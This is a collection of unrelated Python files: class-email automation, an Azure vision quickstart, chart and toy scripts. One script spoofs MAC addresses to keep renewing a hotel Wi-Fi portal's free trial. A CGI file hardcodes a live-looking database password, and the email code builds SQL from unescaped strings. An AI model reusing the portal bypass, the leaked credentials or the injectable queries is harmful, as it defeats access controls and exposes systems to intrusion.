student_cap = cursor.fetchall()[0][0]
if student_cap != -1:
e2(class_name, cursor)
return
cursor.execute(sql5)
class_asdf = cursor.fetchall()[0]
class_id = class_asdf[0]
last_stud = class_asdf[1]
if (last_stud == None):
last_stud = "0000-00-00 00:00:00"
cursor.execute(sql4.format(class_id, last_stud))
student_ids = cursor.fetchall()
cursor.execute(sql2)
class_info = list(cursor.fetchall()[0])
cursor.execute(sql3)
stuff = cursor.fetchall()[0]
email_info = []
email_info.append(stuff[0])
email_info.append(stuff[1])
time_est = helper_functions.gettime(class_info[3], class_info[4])[0]
time_cst = helper_functions.gettime(class_info[3], class_info[4])[1]
class_info[3] = time_est
class_info[4] = time_cst
startdate = helper_functions.getdate(class_info[6], class_info[8])[0]
enddate = helper_functions.getdate(class_info[6], class_info[8])[1]
import datetime
skipclass = None
for i in skipping_weeks:
if class_info[6] < datetime.date(i[0], i[1], i[2]) and class_info[8] > datetime.date(i[0], i[1], i[2]):
skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
class_info[6] = startdate
class_info[8] = enddate
if "weeklong" in class_info[5]:
class_info[5] = "Monday"
class_info[7] = "Friday"
print(class_info)
emails = []
for j in student_ids:
i = j[0]
print(i)
cursor.execute(sql.format(i))
theemails = cursor.fetchall()[0]
if (list(theemails) not in emails):
emails.append(list(theemails))
sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
print(emails.append(teacher_info))
prep_to_send("e1", emails, email_info, class_info, qwert=[skipclass])
def e2(class_name, cursor):
emails = []
waitlist_emails = []
sql = 'SELECT id FROM classes WHERE short_name = "%s"' % class_name
sql2 = 'SELECT last_student, final_student FROM classes WHERE short_name = "%s"' % class_name
sql3 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql35 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}"'
sql4 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql5 = 'SELECT name, teacher, e1_summary, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, email, name FROM classes WHERE short_name = "%s";' % (class_name[0].upper() + class_name[1:])
sql55 = 'SELECT name, teacher, name FROM classes WHERE short_name = "%s";' % class_name
sql6 = 'SELECT subject, content FROM templates WHERE name="e1"'
sql65 = 'SELECT subject, content FROM templates WHERE name="e2"'
print("1")
cursor.execute(sql)
class_id = cursor.fetchall()[0][0]
print("2")
cursor.execute(sql2)
fila_student = cursor.fetchall()[0]
print(fila_student[0])
cursor.execute(sql3.format(class_id, fila_student[0], fila_student[1]))
welcome_studentids = cursor.fetchall()
print("4")
cursor.execute(sql35.format(class_id, fila_student[1]))
waitlist_studentids = cursor.fetchall()
for i in welcome_studentids:
cursor.execute(sql4.format(i[0]))
student_info = cursor.fetchall()[0]
if (student_info not in emails):
emails.append(student_info)
for i in waitlist_studentids:
cursor.execute(sql4.format(i[0]))
student_info = cursor.fetchall()[0]
if (student_info not in waitlist_emails):
waitlist_emails.append(student_info)
print("5")
cursor.execute(sql5)
welcome_classinfo = list(cursor.fetchall()[0])
# timeest = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[0]
# timecst = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[1]
# startdate = helper_functions.getdate(welcome_classinfo[5], welcome_classinfo[6])[0]
# enddate = helper_functions.getdate(welcome_classinfo[5], welcome_classinfo[6])[1]
# welcome_classinfo[3] = timeest
# welcome_classinfo[4] = timecst
# welcome_classinfo[5] = startdate
# welcome_classinfo[6] = enddate
# print(welcome_classinfo)
time_est = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[0]
time_cst = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[1]
welcome_classinfo[3] = time_est
welcome_classinfo[4] = time_cst
startdate = helper_functions.getdate(welcome_classinfo[6], welcome_classinfo[8])[0]
enddate = helper_functions.getdate(welcome_classinfo[6], welcome_classinfo[8])[1]
import datetime
skipclass = None
for i in skipping_weeks:
if welcome_classinfo[6] < datetime.date(i[0], i[1], i[2]) and welcome_classinfo[8] > datetime.date(i[0], i[1], i[2]):
skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
welcome_classinfo[6] = startdate
welcome_classinfo[8] = enddate
if "weeklong" in welcome_classinfo[5]:
welcome_classinfo[5] = "Monday"
welcome_classinfo[7] = "Friday"
for i in range(len(welcome_classinfo)):
if welcome_classinfo[i] == None:
welcome_classinfo[i] = ''
print("6")
cursor.execute(sql55)
waitlist_classinfo = cursor.fetchall()[0]
print(waitlist_classinfo)
print("7")
cursor.execute(sql65)
waitlist_emailinfo = cursor.fetchall()[0]
print("7.5")
cursor.execute(sql6)
email_info = cursor.fetchall()[0]
print("8")
for i in range(0, len(welcome_classinfo)):
if (welcome_classinfo[i] == None):
welcome_classinfo[i] == ''
for i in range(0, len(waitlist_classinfo)):
if (waitlist_classinfo[i] == None):
waitlist_classinfo[i] == ''
sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
print(emails.append(teacher_info))
prep_to_send("e2", emails, email_info, welcome_classinfo=welcome_classinfo, waitlist_emails=waitlist_emails, waitlist_emailinfo=waitlist_emailinfo, waitlist_classinfo=waitlist_classinfo)
def esa(class_name, cursor):
classes = []
emails = []
#subject_area = input("Subject Area? ")
while True:
r = input("What classes? ").lower()
if (r == 'stop' or r == None or r== ''):
break
classes.append(r[0].upper() + r[1:])
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id FROM classes_to_students WHERE class_id = "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql4 = 'SELECT short_name, name, short_name, description, teacher, starttime, endtime, startdate, enddate, day FROM classes WHERE short_name = "{}"'
sql5 = 'SELECT subject, content FROM templates WHERE name="esa"'
qwert = {}
print(classes)
for k in classes:
cursor.execute(sql.format(k))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql2.format(class_id))
students = cursor.fetchall()
for qw in students:
cursor.execute(sql3.format(qw[0]))
emaillist = list(cursor.fetchall()[0])
emaillist.append(k)
if (list(emaillist) not in emails):
emails.append(list(emaillist))
qwert[emaillist[0]] = k
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
#class_info.insert(0, input("subject_area"))
class_info[5] = helper_functions.gettime(class_info[5], class_info[6])[0]
class_info.remove(class_info[6])
if (helper_functions.getdate(class_info[6], class_info[7])[0] != "TBD"):
if ("weeklong" in class_info[8]):
class_info[6] = "Monday - Friday, " + helper_functions.getdate(class_info[6], class_info[7])[0] + " - " + helper_functions.getdate(class_info[6], class_info[7])[1]
else:
class_info[6] = class_info[8] + "s, " + helper_functions.getdate(class_info[6], class_info[7])[0] + " - " + helper_functions.getdate(class_info[6], class_info[7])[1]
else:
class_info[6] = "TBD"
class_info.remove(class_info[7])
class_info.remove(class_info[7])
class_info.insert(2, "signup.helmlearning.com/page1.html?class=" + class_name.lower().replace(" ", "-"))
class_info.insert(1, "[prev classes]")
cursor.execute(sql5.format(email_to_send))
email_info = list(cursor.fetchall()[0])
prep_to_send("esa", emails, email_info, class_info, qwert=qwert)
def e3(class_name, cursor):
emails = []
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql6 = 'SELECT final_student FROM classes WHERE short_name = "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql4 = 'SELECT short_name, starttime, endtime, e3_briefdescription, zoom, zoom, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
sql5 = 'SELECT subject, content FROM templates WHERE name="e3"'
cursor.execute(sql.format(class_name))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
if (class_info[-1] == None):
class_info[-1] = "0000-00-00 00:00:00"
cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
student_ids = cursor.fetchall()
cursor.execute(sql6.format(class_name))
last_student = cursor.fetchall()[0][0]
for i in student_ids:
cursor.execute(sql3.format(i[0]))
des_emaux = cursor.fetchall()[0]
if (list(des_emaux) not in emails):
emails.append(list(des_emaux))
print(i[1])
# print(final_student)
# if (i[1] == last_student):
# print("BREAK")
# break
#print(emails)
class_info[1] = helper_functions.gettime(class_info[1], class_info[2])[0]
class_info.remove(class_info[2])
class_info.insert(1, input("Drive link: "))
cursor.execute(sql5)
email_info = cursor.fetchall()[0]
print(class_info)
sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
print(emails.append(teacher_info))
prep_to_send("e3", emails, email_info, class_info)
def e4(class_name, cursor):
emails = []
#send e4
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql4 = 'SELECT name, e4_continuingfurther, teacher, email, name, final_student, last_student FROM classes WHERE short_name = "{}"'
sql5 = 'SELECT subject, content FROM templates WHERE name="e4"'
cursor.execute(sql.format(class_name))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
if (class_info[-1] == None):
class_info[-1] = "0000-00-00 00:00:00"
cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
student_ids = cursor.fetchall()
for i in student_ids:
cursor.execute(sql3.format(i[0]))
des_emaux = cursor.fetchall()[0]
if (list(des_emaux) not in emails):
emails.append(list(des_emaux))
print(i[1])
cursor.execute(sql5)
email_info = cursor.fetchall()[0]
print(class_info[-2])
sql6 = "UPDATE classes SET final_student = null WHERE short_name = '{}'".format(class_name)
sql7 = "UPDATE classes SET last_student = '{}' WHERE short_name = '{}'".format(class_info[-2], class_name)
sql8 = "UPDATE classes SET class_started = 0 WHERE short_name = '{}'".format(class_name)
sql9 = "UPDATE classes SET day = '' WHERE short_name = '{}'".format(class_name)
sql10 = "UPDATE classes SET startdate = '0000-00-00' WHERE short_name = '{}'".format(class_name)
sql11 = "UPDATE classes SET enddate = '0000-00-00' WHERE short_name = '{}'".format(class_name)
cursor.execute(sql6)
cursor.execute(sql7)
cursor.execute(sql8)
cursor.execute(sql9)
cursor.execute(sql10)
cursor.execute(sql11)
#make sure to change the final student and the last student
#also make sure to change the class_started
#and the day and week
print(class_info)
sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
print(emails.append(teacher_info))
prep_to_send("e4", emails, email_info, class_info)
def er1(class_name, cursor):
emails = []
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql4 = 'SELECT name, day, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
sql5 = 'SELECT subject, content FROM templates WHERE name="er1"'
cursor.execute(sql.format(class_name))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
if (class_info[-1] == None):
class_info[-1] = "0000-00-00 00:00:00"
if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
class_info[-2] = "9999-99-99 99:99:99"
cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
student_ids = cursor.fetchall()
for i in student_ids:
cursor.execute(sql3.format(i[0]))
des_emaux = cursor.fetchall()[0]
if (list(des_emaux) not in emails):
emails.append(list(des_emaux))
print(i[1])
import datetime
skipclass = None
for i in skipping_weeks:
if class_info[5] < datetime.date(i[0], i[1], i[2]) and class_info[7] > datetime.date(i[0], i[1], i[2]):
skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
if "weeklong" in class_info[1]:
class_info[1] = "Monday"
class_info[4] = "Monday"
class_info[6] = "Friday"
est = helper_functions.gettime(class_info[2], class_info[3])[0]
cst = helper_functions.gettime(class_info[2], class_info[3])[1]
class_info[2] = est
class_info[3] = cst
stime = helper_functions.getdate(class_info[5], class_info[7])[0]
etime = helper_functions.getdate(class_info[5], class_info[7])[1]
class_info[5] = stime
class_info[7] = etime
class_info.remove(class_info[-2])
class_info.remove(class_info[-1])
cursor.execute(sql5)
email_info = cursor.fetchall()[0]
# print(class_info)
sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
emails.append(teacher_info)
prep_to_send("er1", emails, email_info, class_info, qwert=[skipclass])
def er2(class_name, cursor):
emails = []
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
sql4 = 'SELECT short_name, zoom, zoom, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
sql5 = 'SELECT subject, content FROM templates WHERE name="er2"'
cursor.execute(sql.format(class_name))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
if (class_info[-1] == None):
class_info[-1] = "0000-00-00 00:00:00"
if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
class_info[-2] = "9999-99-99 99:99:99"
cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
student_ids = cursor.fetchall()
for i in student_ids:
cursor.execute(sql3.format(i[0]))
des_emaux = cursor.fetchall()[0]
if (list(des_emaux) not in emails):
emails.append(list(des_emaux))
print(i[1])
class_info.remove(class_info[-2])
class_info.remove(class_info[-1])
cursor.execute(sql5)
email_info = cursor.fetchall()[0]
# print(class_info)
if __name__ == "__main__":
run_class_starting = input("Run class_starting.py? ")
if run_class_starting.lower() == "yes":
import class_starting
sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
cursor.execute(sql_teacher_email)
teacher_info = list(cursor.fetchall()[0])
emails.append(teacher_info)
prep_to_send("er2", emails, email_info, class_info)
def ge(class_name, cursor):
emails = []
sql = 'SELECT id FROM classes WHERE short_name = "{}"'
sql4 = 'SELECT final_student, last_student FROM classes WHERE short_name = "{}"'
sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
cursor.execute(sql.format(class_name))
class_id = cursor.fetchall()[0][0]
cursor.execute(sql4.format(class_name))
class_info = list(cursor.fetchall()[0])
if (class_info[-1] == None):
class_info[-1] = "0000-00-00 00:00:00"
if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
class_info[-2] = "9999-99-99 99:99:99"
cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
student_ids = cursor.fetchall()
for i in student_ids:
cursor.execute(sql3.format(i[0]))
e = cursor.fetchall()[0]
if (list(e) not in emails):
emails.append(list(e))
for i in emails:
print(i[0])
print(i[1])
#input("good?")
return emails
def prep_to_send(email_to_send, emails, email_info, class_info=[], welcome_classinfo=[], waitlist_emails=[], qwert=[1], waitlist_emailinfo=[], waitlist_classinfo=[]):
if (email_to_send != "e2"):
class_info = list(class_info)
for c in range(0, len(class_info)):
if class_info[c] == None:
class_info[c] = ""
for j in emails:
print(j)
if __name__ == "__main__":
input("Send?")
for j in emails:
print(j[0])
print(j[1])
print(j[2])
if (email_to_send == "e1" or email_to_send == "esa" or email_to_send == "e3" or email_to_send == "e4" or email_to_send == "er1" or email_to_send == "er2"):
if (email_to_send == "esa"):
class_info[1] = j[3]
send(email_to_send, email_info[0], email_info[1], j[2], j[0], j[1], class_info, extra_content=qwert[j[0]])
else:
print("\n\n\n%s\n\n\n" % class_info)
send(email_to_send, email_info[0], email_info[1], j[2], j[0], j[1], class_info)
elif (email_to_send == "e2"):
print("\n\n\n%s\n\n\n" % welcome_classinfo)
send("e1", email_info[0], email_info[1], j[2], j[0], j[1], welcome_classinfo)
if (email_to_send == "e2"):
for j in waitlist_emails:
print(j)
if __name__ == "__main__":
input("Send??")
for j in waitlist_emails:
print("Waitlist")
print(j[0])
print(j[1])
send(email_to_send, waitlist_emailinfo[0], waitlist_emailinfo[1], j[2], j[0], j[1], waitlist_classinfo)
print("\nEmails not sent: ")
#tutorial at https://realpython.com/python-send-email/
if __name__ == "__main__":
db = "HELM_Database"
cnx = create_connection()
cursor = cnx.cursor(buffered=True)
email_to_send = input("E1, E2, E3, E4, ESA, ER1, ER2, Get Emails? ").lower()
class_name = input("class?").lower()
class_name = class_name[0].upper() + class_name[1:]
if (email_to_send == "e1"):
e1(class_name, cursor)
elif (email_to_send == "e2"):
e2(class_name, cursor)
elif (email_to_send == "e3"):
e3(class_name, cursor)
elif (email_to_send == "e4"):
e4(class_name, cursor)
elif (email_to_send == "esa"):
esa(class_name, cursor)
elif (email_to_send == "er1"):
er1(class_name, cursor)
elif (email_to_send == "er2"):
er2(class_name, cursor)
elif (email_to_send == "ge"):
ge(class_name, cursor)
else:
print("You're bad and you should feel bad about yourself")
for i in not_sent_emails:
print(i)
cnx.commit()
cursor.close()
cnx.close()
# final student for Python 5 week class: 2020-12-05 20:26:44
# last student for Py: 2020-08-09 20:38:18
# last student: 2020-12-05 20:26:44
|
answers = {'привет':'Привет',
'как дела': 'Хорошо',
'что делаешь': 'Программирую'
}
def get_answer(question, answers):
return answers.get(question)
def ask_user(answers):
while True:
try:
user_say = input('Скажи что-нибудь:')
answer = get_answer(user_say, answers)
if user_say == 'пока':
print('До встречи')
break
if answer is None:
print(f'Сам ты {user_say}')
else:
print(answer)
except KeyboardInterrupt:
print('Пока!')
break
if __name__ == '__main__':
ask_user(answers) |
from azure.cognitiveservices.vision.computervision import ComputerVisionClient
from azure.cognitiveservices.vision.computervision.models import OperationStatusCodes
from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes
from msrest.authentication import CognitiveServicesCredentials
from array import array
import os
from PIL import Image
import sys
import time
from dotenv import load_dotenv
local_image_path = "resources/helicopter.jpg"
load_dotenv()
subscription_key = os.getenv('dchwcogsaccountkey')
endpoint = os.getenv('dchwcogsaccountendpoint')
computervision_client = ComputerVisionClient(endpoint, CognitiveServicesCredentials(subscription_key))
'''
Describe an Image - local
This example describes the contents of an image with the confidence score.
'''
print("===== Describe an Image =====")
local_image = open(local_image_path, "rb")
description_result = computervision_client.describe_image_in_stream(local_image)
print("Description of local image: ")
if (len(description_result.captions) == 0):
print("No description detected.")
else:
for caption in description_result.captions:
print("'{}' with confidence {:.2f}%".format(caption.text, caption.confidence * 100))
print()
'''
END - Describe an Image - local
'''
'''
Categorize an Image - local
This example extracts categories from a local image with a confidence score
'''
print("===== Categorize an Image =====")
local_image = open(local_image_path, "rb")
local_image_features = ["categories"]
categorize_results_local = computervision_client.analyze_image_in_stream(local_image, local_image_features)
print("Categories from local image: ")
if (len(categorize_results_local.categories) == 0):
print("No categories detected.")
else:
for category in categorize_results_local.categories:
print("'{}' with confidence {:.2f}%".format(category.name, category.score * 100))
print()
'''
END - Categorize an Image - local
'''
'''
Tag an Image - local
This example returns a tag (key word) for each thing in the image.
'''
print("===== Tag an Image =====")
local_image = open(local_image_path, "rb")
tags_result_local = computervision_client.tag_image_in_stream(local_image)
print("Tags in the local image: ")
if (len(tags_result_local.tags) == 0):
print("No tags detected.")
else:
for tag in tags_result_local.tags:
print("'{}' with confidence {:.2f}%".format(tag.name, tag.confidence * 100))
print()
'''
END - Tag an Image - local
'''
'''
Detect Color - local
This example detects the different aspects of its color scheme in a local image.
'''
print("===== Detect Color =====")
local_image = open(local_image_path, "rb")
local_image_features = ["color"]
detect_color_results_local = computervision_client.analyze_image_in_stream(local_image, local_image_features)
print("Getting color scheme of the local image: ")
print("Is black and white: {}".format(detect_color_results_local.color.is_bw_img))
print("Accent color: {}".format(detect_color_results_local.color.accent_color))
print("Dominant background color: {}".format(detect_color_results_local.color.dominant_color_background))
print("Dominant foreground color: {}".format(detect_color_results_local.color.dominant_color_foreground))
print("Dominant colors: {}".format(detect_color_results_local.color.dominant_colors))
print()
'''
END - Detect Color - local
'''
'''
Detect Objects - local
This example detects different kinds of objects with bounding boxes in a local image.
'''
print("===== Detect Objects =====")
local_image_objects = open(local_image_path, "rb")
detect_objects_results_local = computervision_client.detect_objects_in_stream(local_image_objects)
print("Detecting objects in local image:")
if len(detect_objects_results_local.objects) == 0:
print("No objects detected.")
else:
for object in detect_objects_results_local.objects:
print("object at location {}, {}, {}, {}".format( \
object.rectangle.x, object.rectangle.x + object.rectangle.w, \
object.rectangle.y, object.rectangle.y + object.rectangle.h))
print()
'''
END - Detect Objects - local
'''
'''
Generate Thumbnail
This example creates a thumbnail.
'''
print("===== Generate Thumbnail =====")
local_image_thumb = open(local_image_path, "rb")
print("Generating thumbnail from a local image...")
# Call the API with a local image, set the width/height if desired (pixels)
# Returns a Generator object, a thumbnail image binary (list).
thumb_local = computervision_client.generate_thumbnail_in_stream(100, 100, local_image_thumb, True)
# Write the image binary to file
with open("resources/thumb.png", "wb") as f:
for chunk in thumb_local:
f.write(chunk)
# Uncomment/use this if you are writing many images as thumbnails from a list
# for i, image in enumerate(thumb_local, start=0):
# with open('thumb_{0}.jpg'.format(i), 'wb') as f:
# f.write(image)
print("Thumbnail saved to local folder.")
print()
'''
END - Generate Thumbnail
'''
'''
Recognize Printed Text with OCR - local
This example will extract, using OCR, printed text in an image, then print results line by line.
'''
print("===== Detect Printed Text with OCR =====")
local_image_printed_text = open(local_image_path, "rb")
ocr_result_local = computervision_client.recognize_printed_text_in_stream(local_image_printed_text)
for region in ocr_result_local.regions:
for line in region.lines:
print("Bounding box: {}".format(line.bounding_box))
s = ""
for word in line.words:
s += word.text + " "
print(s)
print()
'''
END - Recognize Printed Text with OCR - local
'''
print("End of Computer Vision quickstart.")
|
#!C:\Python27\python.exe
#-*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
import numpy as np
import cgi
import cgitb
import mpld3 as d3
import sqlalchemy as sql
import sys
reload(sys)
sys.setdefaultencoding('utf8')
cgitb.enable()
#form=cgi.FieldStorage()
#formm=form.getvalue('kind')
formm="pie"
conn=sql.create_engine('mysql://inzent:1q2w3e4r!@inzent.cyuky5umqyhf.ap-northeast-2.rds.amazonaws.com:3306/inzent?charset=utf8')
query=pd.read_sql("select MAXSPACE-SPACELEFT, SPACELEFT from ASYSVOLUME", conn)
using1=round(query.iloc[0][0]/1073741824,3)
remain1=round(query.iloc[0][1]/1073741824,3)
using2=round(query.iloc[1][0]/1073741824,3)
remain2=round(query.iloc[1][1]/1073741824,3)
ul0=[using1+using2, remain1+remain2]
label=['using','remain']
a=plt.figure()
DPI = a.get_dpi()
a.set_size_inches(2300.0/float(DPI),800.0/float(DPI))
plt.style.use('fivethirtyeight')
mpl.rcParams['font.size']=20
if formm=="pie" :
ul1=[using1, remain1]
ul2=[using2, remain2]
plt.subplot(132, facecolor="none")
plt.pie(ul1, labels=[str(using1)+'GB', str(remain1)+'GB'], autopct='%1.1f%%')
plt.title('storage1')
plt.subplot(133, facecolor="none")
plt.pie(ul2, labels=[str(using2)+'GB', str(remain2)+'GB'], autopct='%1.1f%%')
plt.title('storage2')
plt.subplot(131, facecolor="none")
plt.pie(ul0, labels=[str(ul0[0])+'GB', str(ul0[1])+'GB'], autopct='%1.1f%%')
plt.title('Total')
plt.legend(label, loc="upper left")
elif formm=="bar":
archive=['Total', 'storage1', 'storage2']
ind=[x for x, _ in enumerate(archive)]
using=np.array([using1+using2, using1, using2])
remain=np.array([remain1+remain2, remain1, remain2])
total=using+remain
pro_using=np.true_divide(using, total)*100
pro_remain=np.true_divide(remain, total)*100
plt.subplot(facecolor="none")
plt.bar(ind, pro_using, width=0.4, bottom=pro_remain)
plt.bar(ind, pro_remain, width=0.4)
plt.xticks(ind, archive)
plt.ylim=1.0
plt.legend(label, loc="lower left")
for i,j in zip(ind, remain):
plt.annotate(str(j)+'GB',xy=(i-0.05,pro_remain[i]-5))
plt.annotate(format(pro_remain[i],'1.1f')+'%',xy=(i-0.025,pro_remain[i]-10))
for i,j in zip(ind, using):
plt.annotate(str(j)+'GB',xy=(i-0.05,95))
plt.annotate(format(pro_using[i],'1.1f')+'%',xy=(i-0.025,90))
print 'Content-type: text/html;\n'
print d3.fig_to_html(a)
|
#coding: utf-8
from datetime import date
import boundaries
boundaries.register(u'Pointe-Claire districts',
domain=u'Pointe-Claire, QC',
last_updated=date(2013, 8, 21),
name_func=boundaries.clean_attr('NOM_DISTRI'),
authority=u'Ville de Montréal',
source_url='http://donnees.ville.montreal.qc.ca/fiche/elections-2009-districts/',
licence_url='http://donnees.ville.montreal.qc.ca/licence/licence-texte-complet/',
data_url='http://depot.ville.montreal.qc.ca/elections-2009-districts/multi-poly/data.zip',
encoding='iso-8859-1',
metadata={'geographic_code': '2466097'},
ogr2ogr='''-where "MONTREAL='0'" -where "NUM_ARR='8'"''',
)
|
from __future__ import print_function
import argparse
import random
import re
import subprocess
import sys
import time
import requests
PORTAL_URL = 'https://portal.reivernet.com/'
def set_mac(interface, mac):
"""Set `interface`'s MAC address to `mac`.
Return False if an error occurred (permission denied).
"""
try:
subprocess.check_call(['ifconfig', interface, 'ether', mac])
except subprocess.CalledProcessError:
return False
def get_default_mac(interface):
"""Return the 'burned-in' MAC address."""
output = subprocess.check_output(
['networksetup', '-getmacaddress', interface], universal_newlines=True)
match_object = re.search(
r'^Ethernet Address: ([\w:]+)'.format(interface), output)
if match_object:
return match_object.group(1)
def generate_mac(mac):
"""Return `mac` with the last 24 bits randomized."""
# Split the MAC address into hexadecimal bytes.
mac_bytes = mac.split(':')
# Generate some random hex bytes.
random_hex_bytes = [
'{:02x}'.format(random.randint(0, 255)) for _ in range(3)]
# Replace the last three MAC bytes with random bytes.
return ':'.join(mac_bytes[:3] + random_hex_bytes)
def toggle_interface_status(interface):
"""Set `interface` down, then up."""
time.sleep(1)
subprocess.call(['ifconfig', interface, 'down'])
time.sleep(1)
subprocess.call(['ifconfig', interface, 'up'])
def change_mac(interface):
"""Modify `interface`'s MAC, then toggle `interface`."""
default_mac = get_default_mac(interface)
new_mac = generate_mac(default_mac)
# Exit if permission was denied.
if set_mac(interface, new_mac) is False:
sys.exit('Could not set MAC address. Run with sudo.')
toggle_interface_status(interface)
print("Set {interface}'s MAC to {mac}".format(
interface=interface, mac=new_mac))
def start_trial_session(guest_name, room_number):
"""Start a new Reivernet 30-minute trial session."""
s = requests.Session()
s.get(PORTAL_URL)
s.get(PORTAL_URL, params='useLogin')
s.post(PORTAL_URL, params={
'guestname': guest_name,
'room': room_number,
'authUser': '',
'portID': '1'
})
s.post(PORTAL_URL + 'Accept.php', params={
'radio_plan': '17',
'room': room_number,
'guestname': guest_name,
'reservation': '',
'authUser': '',
'Accept': 'accept',
'connect_btn': 'Connect'
})
print('Logged in as {}, room {}.'.format(guest_name, room_number))
def renew_session(interface, guest_name, room_number):
"""Renew the internet session."""
change_mac(interface)
# Allow time for the interface to come back.
time.sleep(10)
start_trial_session(guest_name, room_number)
def main():
# Parse command line arguments.
parser = argparse.ArgumentParser(
description='Renew Reivernet internet session.')
parser.add_argument('interface', help='network interface')
parser.add_argument('guest_name', help="registered guest's name")
parser.add_argument('room_number', help="guest's room number")
parser.add_argument('-a', '--auto', action='store_true',
help='automatically renew the session periodically')
parser.add_argument('-m', '--minutes', default=28, type=int,
help='specify how many minutes to wait before '
'automatically renewing the session (default '
'%(default)s minutes)')
args = parser.parse_args()
interface = args.interface
guest_name = args.guest_name
room_number = args.room_number
auto = args.auto
minutes = args.minutes
sleep_time = minutes * 60
# Renew the session.
renew_session(interface, guest_name, room_number)
# If auto mode was enabled, renew the session periodically.
if auto:
print('Press Ctrl-C to exit.')
try:
while True:
# Sleep for some time.
print('Sleeping for {} minutes (until {}).'.format(
minutes, time.ctime(time.time() + sleep_time)))
time.sleep(sleep_time)
renew_session(interface, guest_name, room_number)
except KeyboardInterrupt:
print('Exiting.')
if __name__ == '__main__':
main()
|
número = int(input('Digite um número: '))
calculo = número % 2
print(calculo)
if calculo == 0:
print(f'O número {número} é par')
else:
print(f'O número {número} é ímpar')
|
from sklearn import datasets
import numpy as np
from sklearn.model_selection import train_test_split
iris = datasets.load_iris()
setosa = np.array(iris.data[:50, 2])
versicolor = np.array(iris.data[50:100, 2])
virginica = np.array(iris.data[100:150, 2])
X_train, X_validation, y_train, y_validation = train_test_split(iris.data, iris.target, test_size=0.3)
mean_0 = (sum(setosa)) / setosa.size
mean_0 = (sum(setosa)) / setosa.size
mean_1 = (sum(versicolor)) / versicolor.size
mean_2 = (sum(virginica)) / virginica.size
sd_0 = setosa.var()
sd_1 = versicolor.var()
sd_2 = virginica.var()
means = [mean_0, mean_1, mean_2]
sds = [sd_0, sd_1, sd_2]
def f(x, mean, sd):
